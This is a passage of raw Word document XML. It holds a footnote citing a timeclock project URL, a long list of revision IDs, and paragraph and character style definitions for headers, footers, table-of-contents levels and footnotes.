        <w:pStyle w:val="FootnoteText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004214EA">
        <w:t>http://timeclock.sourceforge.net/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4DF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C863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D9648A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE34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12"/>
    <w:rsid w:val="00000059"/>
    <w:rsid w:val="00003C27"/>
    <w:rsid w:val="00031B20"/>
    <w:rsid w:val="000449F2"/>
    <w:rsid w:val="00045BC6"/>
    <w:rsid w:val="00061183"/>
    <w:rsid w:val="0006164B"/>
    <w:rsid w:val="00063A9F"/>
    <w:rsid w:val="00065894"/>
    <w:rsid w:val="0006608D"/>
    <w:rsid w:val="00066E00"/>
    <w:rsid w:val="00070355"/>
    <w:rsid w:val="00071542"/>
    <w:rsid w:val="00072B09"/>
    <w:rsid w:val="0007779E"/>
    <w:rsid w:val="00080F9F"/>
    <w:rsid w:val="00086FD9"/>
    <w:rsid w:val="000A6481"/>
    <w:rsid w:val="000A67B6"/>
    <w:rsid w:val="000B3340"/>
    <w:rsid w:val="000B35F4"/>
    <w:rsid w:val="000B3EFE"/>
    <w:rsid w:val="000B6C5B"/>
    <w:rsid w:val="000C3883"/>
    <w:rsid w:val="000C7CED"/>
    <w:rsid w:val="000D3782"/>
    <w:rsid w:val="000D70FB"/>
    <w:rsid w:val="000E0D76"/>
    <w:rsid w:val="00107E1D"/>
    <w:rsid w:val="00110C5F"/>
    <w:rsid w:val="00116161"/>
    <w:rsid w:val="00121D52"/>
    <w:rsid w:val="001259DB"/>
    <w:rsid w:val="00125B4E"/>
    <w:rsid w:val="00125BB8"/>
    <w:rsid w:val="00126D2B"/>
    <w:rsid w:val="00132E0F"/>
    <w:rsid w:val="00134910"/>
    <w:rsid w:val="001449B9"/>
    <w:rsid w:val="00151CC8"/>
    <w:rsid w:val="00153C1A"/>
    <w:rsid w:val="001572BD"/>
    <w:rsid w:val="00161283"/>
    <w:rsid w:val="00163080"/>
    <w:rsid w:val="00164689"/>
    <w:rsid w:val="00164A3B"/>
    <w:rsid w:val="0017041D"/>
    <w:rsid w:val="00172701"/>
    <w:rsid w:val="00175002"/>
    <w:rsid w:val="00176739"/>
    <w:rsid w:val="001801EB"/>
    <w:rsid w:val="001815A9"/>
    <w:rsid w:val="00191349"/>
    <w:rsid w:val="00192757"/>
    <w:rsid w:val="00193DC7"/>
    <w:rsid w:val="00197381"/>
    <w:rsid w:val="001A498C"/>
    <w:rsid w:val="001A67AF"/>
    <w:rsid w:val="001B44E5"/>
    <w:rsid w:val="001B789E"/>
    <w:rsid w:val="001B7B74"/>
    <w:rsid w:val="001C069D"/>
    <w:rsid w:val="001C3BFC"/>
    <w:rsid w:val="001C4C74"/>
    <w:rsid w:val="001C6879"/>
    <w:rsid w:val="001D1807"/>
    <w:rsid w:val="001D2A52"/>
    <w:rsid w:val="001D5D7A"/>
    <w:rsid w:val="001E289C"/>
    <w:rsid w:val="001E6A21"/>
    <w:rsid w:val="001F6877"/>
    <w:rsid w:val="00203702"/>
    <w:rsid w:val="00210C5D"/>
    <w:rsid w:val="00212ED3"/>
    <w:rsid w:val="00213EC3"/>
    <w:rsid w:val="00235EE0"/>
    <w:rsid w:val="002378B1"/>
    <w:rsid w:val="0024070C"/>
    <w:rsid w:val="00241867"/>
    <w:rsid w:val="0024524B"/>
    <w:rsid w:val="002508B9"/>
    <w:rsid w:val="002556E8"/>
    <w:rsid w:val="002568C0"/>
    <w:rsid w:val="00256EF3"/>
    <w:rsid w:val="00265375"/>
    <w:rsid w:val="00266D3E"/>
    <w:rsid w:val="00273B00"/>
    <w:rsid w:val="00275DA8"/>
    <w:rsid w:val="00275F81"/>
    <w:rsid w:val="002765DF"/>
    <w:rsid w:val="0028198C"/>
    <w:rsid w:val="00286FFE"/>
    <w:rsid w:val="00291141"/>
    <w:rsid w:val="002912D5"/>
    <w:rsid w:val="002B05C5"/>
    <w:rsid w:val="002B6819"/>
    <w:rsid w:val="002F50BA"/>
    <w:rsid w:val="002F6B5D"/>
    <w:rsid w:val="0030387D"/>
    <w:rsid w:val="00304FB8"/>
    <w:rsid w:val="0030765E"/>
    <w:rsid w:val="00311BEB"/>
    <w:rsid w:val="00312BF6"/>
    <w:rsid w:val="003137DF"/>
    <w:rsid w:val="00315331"/>
    <w:rsid w:val="00324D02"/>
    <w:rsid w:val="003267D3"/>
    <w:rsid w:val="00326E49"/>
    <w:rsid w:val="00333271"/>
    <w:rsid w:val="003424D1"/>
    <w:rsid w:val="00345603"/>
    <w:rsid w:val="00346532"/>
    <w:rsid w:val="00352953"/>
    <w:rsid w:val="003622C9"/>
    <w:rsid w:val="00362F81"/>
    <w:rsid w:val="003642C3"/>
    <w:rsid w:val="003643E7"/>
    <w:rsid w:val="00364D1A"/>
    <w:rsid w:val="00371714"/>
    <w:rsid w:val="0038033E"/>
    <w:rsid w:val="0038037D"/>
    <w:rsid w:val="00380F34"/>
    <w:rsid w:val="00382D93"/>
    <w:rsid w:val="003909C6"/>
    <w:rsid w:val="003924B7"/>
    <w:rsid w:val="00394A61"/>
    <w:rsid w:val="003973DD"/>
    <w:rsid w:val="003A10D1"/>
    <w:rsid w:val="003A360B"/>
    <w:rsid w:val="003A3C1B"/>
    <w:rsid w:val="003B32BD"/>
    <w:rsid w:val="003B6225"/>
    <w:rsid w:val="003B62BF"/>
    <w:rsid w:val="003C1888"/>
    <w:rsid w:val="003D5F78"/>
    <w:rsid w:val="003D7637"/>
    <w:rsid w:val="003D7C20"/>
    <w:rsid w:val="003E0D24"/>
    <w:rsid w:val="003E1F17"/>
    <w:rsid w:val="003F6AB3"/>
    <w:rsid w:val="00400921"/>
    <w:rsid w:val="00413723"/>
    <w:rsid w:val="004214EA"/>
    <w:rsid w:val="0042702C"/>
    <w:rsid w:val="00430D09"/>
    <w:rsid w:val="0044273D"/>
    <w:rsid w:val="004540C3"/>
    <w:rsid w:val="0045633F"/>
    <w:rsid w:val="00456BDA"/>
    <w:rsid w:val="00463C20"/>
    <w:rsid w:val="004655B8"/>
    <w:rsid w:val="00466C8C"/>
    <w:rsid w:val="00472010"/>
    <w:rsid w:val="00472FED"/>
    <w:rsid w:val="00481141"/>
    <w:rsid w:val="00481B18"/>
    <w:rsid w:val="004855E1"/>
    <w:rsid w:val="00490BD6"/>
    <w:rsid w:val="00490CCE"/>
    <w:rsid w:val="00495900"/>
    <w:rsid w:val="004A07EB"/>
    <w:rsid w:val="004A086D"/>
    <w:rsid w:val="004B0D16"/>
    <w:rsid w:val="004B0FE8"/>
    <w:rsid w:val="004B1F93"/>
    <w:rsid w:val="004B55FD"/>
    <w:rsid w:val="004D2B4C"/>
    <w:rsid w:val="004D7A39"/>
    <w:rsid w:val="004E5032"/>
    <w:rsid w:val="004F061C"/>
    <w:rsid w:val="004F4B49"/>
    <w:rsid w:val="005012BE"/>
    <w:rsid w:val="005018BE"/>
    <w:rsid w:val="00503D01"/>
    <w:rsid w:val="00510271"/>
    <w:rsid w:val="00522D33"/>
    <w:rsid w:val="005252FD"/>
    <w:rsid w:val="0053494C"/>
    <w:rsid w:val="00535F64"/>
    <w:rsid w:val="005376D3"/>
    <w:rsid w:val="00540374"/>
    <w:rsid w:val="00541641"/>
    <w:rsid w:val="005572D8"/>
    <w:rsid w:val="00575572"/>
    <w:rsid w:val="00576F5D"/>
    <w:rsid w:val="005809AB"/>
    <w:rsid w:val="005811AE"/>
    <w:rsid w:val="0058211B"/>
    <w:rsid w:val="00586D6B"/>
    <w:rsid w:val="00593D4A"/>
    <w:rsid w:val="005958AB"/>
    <w:rsid w:val="005A2D3D"/>
    <w:rsid w:val="005B4F61"/>
    <w:rsid w:val="005B5D57"/>
    <w:rsid w:val="005C6133"/>
    <w:rsid w:val="005C75D7"/>
    <w:rsid w:val="005D579D"/>
    <w:rsid w:val="005D6DBA"/>
    <w:rsid w:val="005E0147"/>
    <w:rsid w:val="005E63AB"/>
    <w:rsid w:val="005F12D0"/>
    <w:rsid w:val="005F54BC"/>
    <w:rsid w:val="005F73EA"/>
    <w:rsid w:val="00601DAD"/>
    <w:rsid w:val="00603B73"/>
    <w:rsid w:val="0060550E"/>
    <w:rsid w:val="0061103E"/>
    <w:rsid w:val="00625908"/>
    <w:rsid w:val="00631F2B"/>
    <w:rsid w:val="0063227C"/>
    <w:rsid w:val="00632F61"/>
    <w:rsid w:val="00635C8C"/>
    <w:rsid w:val="006362B3"/>
    <w:rsid w:val="00636596"/>
    <w:rsid w:val="00637A4B"/>
    <w:rsid w:val="00643516"/>
    <w:rsid w:val="006444A5"/>
    <w:rsid w:val="00647C33"/>
    <w:rsid w:val="00665BA6"/>
    <w:rsid w:val="00665DF5"/>
    <w:rsid w:val="00670EE4"/>
    <w:rsid w:val="00671DA3"/>
    <w:rsid w:val="00673D3D"/>
    <w:rsid w:val="006B09F4"/>
    <w:rsid w:val="006B5DD6"/>
    <w:rsid w:val="006B668D"/>
    <w:rsid w:val="006C637E"/>
    <w:rsid w:val="006E2796"/>
    <w:rsid w:val="006E7061"/>
    <w:rsid w:val="006E75E5"/>
    <w:rsid w:val="0070195F"/>
    <w:rsid w:val="00720BE3"/>
    <w:rsid w:val="00727C1C"/>
    <w:rsid w:val="00734B2E"/>
    <w:rsid w:val="00761638"/>
    <w:rsid w:val="00763073"/>
    <w:rsid w:val="007673ED"/>
    <w:rsid w:val="00772291"/>
    <w:rsid w:val="0078027F"/>
    <w:rsid w:val="00792437"/>
    <w:rsid w:val="007926C3"/>
    <w:rsid w:val="0079636C"/>
    <w:rsid w:val="00797C2A"/>
    <w:rsid w:val="007A44EE"/>
    <w:rsid w:val="007A48F2"/>
    <w:rsid w:val="007A7416"/>
    <w:rsid w:val="007A7FD0"/>
    <w:rsid w:val="007B3183"/>
    <w:rsid w:val="007B6436"/>
    <w:rsid w:val="007C2B01"/>
    <w:rsid w:val="007C3167"/>
    <w:rsid w:val="007C48D4"/>
    <w:rsid w:val="007C664E"/>
    <w:rsid w:val="007D09D1"/>
    <w:rsid w:val="007D5F21"/>
    <w:rsid w:val="007E3D4E"/>
    <w:rsid w:val="007F077B"/>
    <w:rsid w:val="007F27F8"/>
    <w:rsid w:val="007F7438"/>
    <w:rsid w:val="008047DB"/>
    <w:rsid w:val="00804AF0"/>
    <w:rsid w:val="00806949"/>
    <w:rsid w:val="00807D51"/>
    <w:rsid w:val="0082423D"/>
    <w:rsid w:val="00835475"/>
    <w:rsid w:val="00836152"/>
    <w:rsid w:val="00842157"/>
    <w:rsid w:val="008451CB"/>
    <w:rsid w:val="008522BF"/>
    <w:rsid w:val="00857C9D"/>
    <w:rsid w:val="008646FE"/>
    <w:rsid w:val="00872EE7"/>
    <w:rsid w:val="008A04C5"/>
    <w:rsid w:val="008A0728"/>
    <w:rsid w:val="008A76C1"/>
    <w:rsid w:val="008B5724"/>
    <w:rsid w:val="008C0598"/>
    <w:rsid w:val="008C5723"/>
    <w:rsid w:val="008D15C3"/>
    <w:rsid w:val="008D3066"/>
    <w:rsid w:val="008D406F"/>
    <w:rsid w:val="008E466C"/>
    <w:rsid w:val="008E6E32"/>
    <w:rsid w:val="008F7DB9"/>
    <w:rsid w:val="00900FBE"/>
    <w:rsid w:val="0090446E"/>
    <w:rsid w:val="00907449"/>
    <w:rsid w:val="00911C95"/>
    <w:rsid w:val="00916E2E"/>
    <w:rsid w:val="00917358"/>
    <w:rsid w:val="00921A28"/>
    <w:rsid w:val="00925BB8"/>
    <w:rsid w:val="0092645A"/>
    <w:rsid w:val="00926FA5"/>
    <w:rsid w:val="00927E7D"/>
    <w:rsid w:val="0093571A"/>
    <w:rsid w:val="00951440"/>
    <w:rsid w:val="0095230A"/>
    <w:rsid w:val="00955CDD"/>
    <w:rsid w:val="009603CC"/>
    <w:rsid w:val="00966F6A"/>
    <w:rsid w:val="009705FF"/>
    <w:rsid w:val="0097445A"/>
    <w:rsid w:val="0097546C"/>
    <w:rsid w:val="00984C8D"/>
    <w:rsid w:val="00986D61"/>
    <w:rsid w:val="009929E9"/>
    <w:rsid w:val="00993DA0"/>
    <w:rsid w:val="00995292"/>
    <w:rsid w:val="009957DC"/>
    <w:rsid w:val="00997898"/>
    <w:rsid w:val="009A3DC0"/>
    <w:rsid w:val="009A4466"/>
    <w:rsid w:val="009B1FF2"/>
    <w:rsid w:val="009B1FFB"/>
    <w:rsid w:val="009B422E"/>
    <w:rsid w:val="009B473B"/>
    <w:rsid w:val="009B4F89"/>
    <w:rsid w:val="009B58E4"/>
    <w:rsid w:val="009B77FD"/>
    <w:rsid w:val="009C1557"/>
    <w:rsid w:val="009C688B"/>
    <w:rsid w:val="009E00A1"/>
    <w:rsid w:val="009E0710"/>
    <w:rsid w:val="009F06C1"/>
    <w:rsid w:val="009F097A"/>
    <w:rsid w:val="00A05022"/>
    <w:rsid w:val="00A07967"/>
    <w:rsid w:val="00A11700"/>
    <w:rsid w:val="00A15570"/>
    <w:rsid w:val="00A20BBD"/>
    <w:rsid w:val="00A27AA1"/>
    <w:rsid w:val="00A30CD7"/>
    <w:rsid w:val="00A34E18"/>
    <w:rsid w:val="00A41E96"/>
    <w:rsid w:val="00A432B9"/>
    <w:rsid w:val="00A45712"/>
    <w:rsid w:val="00A473B9"/>
    <w:rsid w:val="00A502D3"/>
    <w:rsid w:val="00A52BF2"/>
    <w:rsid w:val="00A56A58"/>
    <w:rsid w:val="00A6436B"/>
    <w:rsid w:val="00A6474E"/>
    <w:rsid w:val="00A65237"/>
    <w:rsid w:val="00A669CB"/>
    <w:rsid w:val="00A66E96"/>
    <w:rsid w:val="00A86234"/>
    <w:rsid w:val="00A879BB"/>
    <w:rsid w:val="00A90AA5"/>
    <w:rsid w:val="00A91935"/>
    <w:rsid w:val="00A9352D"/>
    <w:rsid w:val="00A96E53"/>
    <w:rsid w:val="00A97727"/>
    <w:rsid w:val="00AA25A6"/>
    <w:rsid w:val="00AA6BE2"/>
    <w:rsid w:val="00AB5287"/>
    <w:rsid w:val="00AC52EA"/>
    <w:rsid w:val="00AE1054"/>
    <w:rsid w:val="00B00FB9"/>
    <w:rsid w:val="00B152A9"/>
    <w:rsid w:val="00B1733B"/>
    <w:rsid w:val="00B22FCB"/>
    <w:rsid w:val="00B26227"/>
    <w:rsid w:val="00B271D8"/>
    <w:rsid w:val="00B338BC"/>
    <w:rsid w:val="00B35916"/>
    <w:rsid w:val="00B52109"/>
    <w:rsid w:val="00B56CDE"/>
    <w:rsid w:val="00B6289B"/>
    <w:rsid w:val="00B62992"/>
    <w:rsid w:val="00B71AA4"/>
    <w:rsid w:val="00B804A3"/>
    <w:rsid w:val="00B848A7"/>
    <w:rsid w:val="00B84BFA"/>
    <w:rsid w:val="00B86B2D"/>
    <w:rsid w:val="00B928B6"/>
    <w:rsid w:val="00B92F34"/>
    <w:rsid w:val="00B93EDF"/>
    <w:rsid w:val="00B973D9"/>
    <w:rsid w:val="00BA16AB"/>
    <w:rsid w:val="00BA43FB"/>
    <w:rsid w:val="00BB31C7"/>
    <w:rsid w:val="00BB484F"/>
    <w:rsid w:val="00BB4FAB"/>
    <w:rsid w:val="00BB6A10"/>
    <w:rsid w:val="00BC3456"/>
    <w:rsid w:val="00BC3CCF"/>
    <w:rsid w:val="00BC5447"/>
    <w:rsid w:val="00BD225D"/>
    <w:rsid w:val="00BD4FEC"/>
    <w:rsid w:val="00BE0137"/>
    <w:rsid w:val="00BE13A3"/>
    <w:rsid w:val="00BE1957"/>
    <w:rsid w:val="00BE3F64"/>
    <w:rsid w:val="00BE592C"/>
    <w:rsid w:val="00BF65FC"/>
    <w:rsid w:val="00BF7917"/>
    <w:rsid w:val="00C00021"/>
    <w:rsid w:val="00C010FC"/>
    <w:rsid w:val="00C0695A"/>
    <w:rsid w:val="00C06A51"/>
    <w:rsid w:val="00C0754C"/>
    <w:rsid w:val="00C13405"/>
    <w:rsid w:val="00C13E11"/>
    <w:rsid w:val="00C166A3"/>
    <w:rsid w:val="00C21D2A"/>
    <w:rsid w:val="00C239EE"/>
    <w:rsid w:val="00C300CB"/>
    <w:rsid w:val="00C30123"/>
    <w:rsid w:val="00C34A13"/>
    <w:rsid w:val="00C42E4D"/>
    <w:rsid w:val="00C45F3F"/>
    <w:rsid w:val="00C46FFA"/>
    <w:rsid w:val="00C51F53"/>
    <w:rsid w:val="00C6147E"/>
    <w:rsid w:val="00C655B8"/>
    <w:rsid w:val="00C6663F"/>
    <w:rsid w:val="00C85CBD"/>
    <w:rsid w:val="00C868CF"/>
    <w:rsid w:val="00C9138E"/>
    <w:rsid w:val="00C919E9"/>
    <w:rsid w:val="00C96DBA"/>
    <w:rsid w:val="00CA3D12"/>
    <w:rsid w:val="00CA4451"/>
    <w:rsid w:val="00CA4AAC"/>
    <w:rsid w:val="00CA588E"/>
    <w:rsid w:val="00CA627A"/>
    <w:rsid w:val="00CB7887"/>
    <w:rsid w:val="00CC1ED4"/>
    <w:rsid w:val="00CC4459"/>
    <w:rsid w:val="00CD2C6E"/>
    <w:rsid w:val="00D018AE"/>
    <w:rsid w:val="00D04326"/>
    <w:rsid w:val="00D14755"/>
    <w:rsid w:val="00D2554D"/>
    <w:rsid w:val="00D26745"/>
    <w:rsid w:val="00D319DF"/>
    <w:rsid w:val="00D3555E"/>
    <w:rsid w:val="00D37929"/>
    <w:rsid w:val="00D415D8"/>
    <w:rsid w:val="00D4484D"/>
    <w:rsid w:val="00D52442"/>
    <w:rsid w:val="00D53510"/>
    <w:rsid w:val="00D539DB"/>
    <w:rsid w:val="00D60E2D"/>
    <w:rsid w:val="00D72D55"/>
    <w:rsid w:val="00D80731"/>
    <w:rsid w:val="00D83EFE"/>
    <w:rsid w:val="00D859A9"/>
    <w:rsid w:val="00D900E9"/>
    <w:rsid w:val="00D90BBE"/>
    <w:rsid w:val="00D94C28"/>
    <w:rsid w:val="00D97188"/>
    <w:rsid w:val="00DA2109"/>
    <w:rsid w:val="00DA284C"/>
    <w:rsid w:val="00DB1458"/>
    <w:rsid w:val="00DB2AB2"/>
    <w:rsid w:val="00DB3C7A"/>
    <w:rsid w:val="00DB74D7"/>
    <w:rsid w:val="00DB7DE0"/>
    <w:rsid w:val="00DC76FE"/>
    <w:rsid w:val="00DD111C"/>
    <w:rsid w:val="00DD5500"/>
    <w:rsid w:val="00DD5E14"/>
    <w:rsid w:val="00DE045F"/>
    <w:rsid w:val="00DE1091"/>
    <w:rsid w:val="00DE6717"/>
    <w:rsid w:val="00DF51F6"/>
    <w:rsid w:val="00DF5E10"/>
    <w:rsid w:val="00E10B53"/>
    <w:rsid w:val="00E12DB4"/>
    <w:rsid w:val="00E239FD"/>
    <w:rsid w:val="00E27534"/>
    <w:rsid w:val="00E306ED"/>
    <w:rsid w:val="00E3774F"/>
    <w:rsid w:val="00E47E8D"/>
    <w:rsid w:val="00E508AC"/>
    <w:rsid w:val="00E55657"/>
    <w:rsid w:val="00E57F30"/>
    <w:rsid w:val="00E7231A"/>
    <w:rsid w:val="00E74693"/>
    <w:rsid w:val="00E823AF"/>
    <w:rsid w:val="00E864E9"/>
    <w:rsid w:val="00E94DC0"/>
    <w:rsid w:val="00EA1231"/>
    <w:rsid w:val="00EA3E69"/>
    <w:rsid w:val="00EB26EA"/>
    <w:rsid w:val="00EB2CB9"/>
    <w:rsid w:val="00EB2EA5"/>
    <w:rsid w:val="00EC00E1"/>
    <w:rsid w:val="00EC2746"/>
    <w:rsid w:val="00ED538A"/>
    <w:rsid w:val="00EE00AB"/>
    <w:rsid w:val="00EE242C"/>
    <w:rsid w:val="00EE39EE"/>
    <w:rsid w:val="00EE6307"/>
    <w:rsid w:val="00EF57BD"/>
    <w:rsid w:val="00EF5B6A"/>
    <w:rsid w:val="00F04A0A"/>
    <w:rsid w:val="00F04CE7"/>
    <w:rsid w:val="00F14289"/>
    <w:rsid w:val="00F207DE"/>
    <w:rsid w:val="00F2089D"/>
    <w:rsid w:val="00F2119C"/>
    <w:rsid w:val="00F2738E"/>
    <w:rsid w:val="00F31F5A"/>
    <w:rsid w:val="00F35E47"/>
    <w:rsid w:val="00F3700C"/>
    <w:rsid w:val="00F55B3C"/>
    <w:rsid w:val="00F61457"/>
    <w:rsid w:val="00F675DF"/>
    <w:rsid w:val="00F771B2"/>
    <w:rsid w:val="00F8232F"/>
    <w:rsid w:val="00F828B3"/>
    <w:rsid w:val="00F84091"/>
    <w:rsid w:val="00F879E7"/>
    <w:rsid w:val="00F97F89"/>
    <w:rsid w:val="00FA24F8"/>
    <w:rsid w:val="00FA4725"/>
    <w:rsid w:val="00FB1F1A"/>
    <w:rsid w:val="00FB3FA3"/>
    <w:rsid w:val="00FB5AA6"/>
    <w:rsid w:val="00FC2D6A"/>
    <w:rsid w:val="00FD200B"/>
    <w:rsid w:val="00FD3EA1"/>
    <w:rsid w:val="00FD52A4"/>
    <w:rsid w:val="00FD5BF1"/>
    <w:rsid w:val="00FD62F6"/>
    <w:rsid w:val="00FD6465"/>
    <w:rsid w:val="00FD6C69"/>
    <w:rsid w:val="00FE05FA"/>
    <w:rsid w:val="00FF38DF"/>
    <w:rsid w:val="00FF4136"/>
    <w:rsid w:val="00FF5429"/>
    <w:rsid w:val="00FF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6532"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{849B0861-5494-3A42-9720-2ACF3432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D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D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D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D12"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA3D12"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA3D12"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA3D12"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CA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D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D12"/>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CA3D1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3D12"/>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8F7DB9"/>
    <w:pPr>
      <w:spacing w:before="480" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7DB9"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00EF5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157"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C51F53"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E0147"/>
    <w:rPr>
